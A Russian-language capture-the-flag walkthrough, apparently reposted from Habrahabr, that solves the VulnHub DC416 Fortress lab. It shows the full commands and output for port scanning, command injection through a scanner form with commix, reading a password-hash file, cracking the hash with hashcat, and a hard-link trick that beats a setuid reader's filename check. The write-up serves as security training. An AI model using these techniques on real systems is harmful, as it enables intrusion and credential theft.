» » VulnHub: Разбираем самый короткий квест DC416 Fortress

 

VulnHub: Разбираем самый короткий квест DC416 Fortress

Автор: admin от 10-01-2017, 14:55, посмотрело: 122

VulnHub: Разбираем самый короткий квест DC416 Fortress

Продолжаем разбор CTF с конференции DefCon Toronto's. Задания предоставлены командой VulnHub, за что им огромное спасибо. На этот раз остановимся на небольшом DC416 Fortress, тут всего 3 флага. Так что будет не сложно.

Ниже, вы можете ознакомиться с предыдущими разборами:


Начнём


Как обычно, после запуска виртуальной машины, смотрим открытые порты:

$ sudo arp-scan -l -I wlan0 | grep "CADMUS COMPUTER SYSTEMS" | awk '{print $1}' | xargs sudo nmap -sV -p1-65535

Starting Nmap 7.01 ( nmap.org ) at 2017-01-09 23:55 MSK
Nmap scan report for 192.168.1.192
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20160310; protocol 2.0)
80/tcp open http Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
443/tcp open ssl/http Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
MAC Address: 08:00:27:0E:F4:C6 (Oracle VirtualBox virtual NIC)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Flag 1


Dirsearch нашел 1 единственный скрипт, что в прочем не удивительно:

$ sudo dirsearch -u 'https://192.168.1.192' -e php,bak,html,txt,jpg -w /usr/share/dirb/wordlists/big.txt -r -f -x 403

VulnHub: Разбираем самый короткий квест DC416 Fortress

Переходим к нему, и видим форму для ввода IP-адреса, и результат сканирования nmap'ом:

VulnHub: Разбираем самый короткий квест DC416 Fortress

Скормим эту форму Commix, и посмотрим что он найдёт:

$ commix -u 'https://192.168.1.192/scanner.php' --data='host=127.0.0.1'

VulnHub: Разбираем самый короткий квест DC416 Fortress

Инъекция выполнена успешна, commix любезно предоставил нам шелл. Осмотревшись в системе замечаем пару подозрительных директорий, в одной из которых и лежит флаг:
commix(os_shell) > ls

index.html k1ngd0m_k3yz logo.png s1kr3t scanner.php styles.css

commix(os_shell) > file s1kr3t

s1kr3t: directory

commix(os_shell) > ls s1kr3t

flag.txt

commix(os_shell) > cat s1kr3t/flag.txt

FLAG{n0_one_br3aches_teh_f0rt}

Flag 2


Во второй директории нас ожидает хеш пароля пользователя craven:
commix(os_shell) > ls k1ngd0m_k3yz

master passwd

commix(os_shell) > cat k1ngd0m_k3yz/master

craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh

commix(os_shell) > cat k1ngd0m_k3yz/passwd

craven:*:1002:1002:User &:/home/craven:/bin/sh

У нас есть хеш пароля. Осмотрев домашнюю директорию пользователя, находим там подсказку к его восстановлению:
commix(os_shell) > ls -l /usr/home/craven

total 24
-r-------- 1 craven craven 46 Nov 6 01:30 flag.txt
-rw-r--r-- 1 craven craven 119 Nov 5 02:23 hint.txt
-rw-r--r-- 1 craven craven 77 Nov 5 02:20 reminders.txt

commix(os_shell) > cat /home/craven/hint.txt

Keep forgetting my password, so I made myself a hint. Password is three digits followed by my pet's name and a symbol.

commix(os_shell) > cat /home/craven/reminders.txt

To buy: index.html k1ngd0m_k3yz logo.png s1kr3t scanner.php styles.css skim milk index.html k1ngd0m_k3yz logo.png s1kr3t scanner.php styles.css organic free-run eggs index.html k1ngd0m_k3yz logo.png s1kr3t scanner.php styles.css dog bone for qwerty index.html k1ngd0m_k3yz logo.png s1kr3t scanner.php styles.css sriracha

Удалив мусор получаем строку:
To buy: skim milk organic free-run eggs dog bone for qwerty sriracha

Мы знаем кличку собаки, дело за малым. Запустив john или hashcat, восстанавливаем пароль:
$ sudo /opt/cudaHashcat/cudaHashcat32.bin -m 1800 -a 3 hash.txt ?d?d?dqwerty?s

$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:931qwerty?

Отлично, авторизуемся по ssh, и забираем второй флаг:

$ ssh craven@192.168.1.192

$ pwd
/usr/home/craven
$ id
uid=1002(craven) gid=1002(craven) groups=1002(craven)
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

Flag 3


В домашней директории пользователя craven, зачем-то оставлен файл с настройками инициализации gdb:

$ ls -ahl
...
-rw-r--r--  1 craven  craven    60B Nov  7 20:36 .gdbinit

С довольно интересным содержимым:

$ cat .gdbinit
source /usr/local/share/peda/peda.py
br *0x0000000000400904

Приятный сюрприз, уже готовый брейкпоинт и peda. Однако не всё так просто, оказалось что pedа до нас всё же удалили… После непродолжительного поиска, находим нашу жертву отладки:

$ ls -ahl /home/vulnhub/
-r--------  1 vulnhub  vulnhub    26B Nov  8 20:08 flag.txt
-rwsr-xr-x  1 vulnhub  vulnhub   8.8K Nov  8 20:15 reader

Файл небольшой, и судя по всему именно он позволит получить последний флаг. Посмотрим что внутри:

$ gdb /home/vulnhub/reader


Разберём что тут происходит:


  • 0x4009bd — проверяется количество переданных аргументов и судя по коду ниже, запрашивается как раз файл, который будет прочитан;

  • 0x4009fe — запрашивается информация об этом файле;

  • 0x400aa4 — вызывается функция strstr, которая сравнивает имя полученного файла со значением по адресу 0x400c37 -> 0x67616c66 -> galf, т.е. как раз со словом flag;

  • 0x400ad1 — выход, если имя файла содержит «flag»;

  • 0x400b3b — считывается 0x64 байт из этого файла и затем выводится на экран.


Самым простым и очевидным вариантом тут, будет создать ссылку на файл flag.txt и передать её в качестве аргумента. Пробуем:

$ ln /home/vulnhub/flag.txt /tmp/qaz
$ /home/vulnhub/reader /tmp/qaz

Checking file type…
Checking if flag file…
Great! Printing file contents…
Win, here's your flag:
FLAG{its_A_ph0t0_ph1ni5h}

Это сработало. Последний флаг у нас. Ещё один квест пройден!

Источник: Хабрахабр

Категория: Информационная безопасность

Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

Добавление комментария

Имя:*
E-Mail:
Комментарий:
Полужирный Наклонный текст Подчеркнутый текст Зачеркнутый текст | Выравнивание по левому краю По центру Выравнивание по правому краю | Вставка смайликов Выбор цвета | Скрытый текст Вставка цитаты Преобразовать выбранный текст из транслитерации в кириллицу Вставка спойлера
Введите два слова, показанных на изображении: *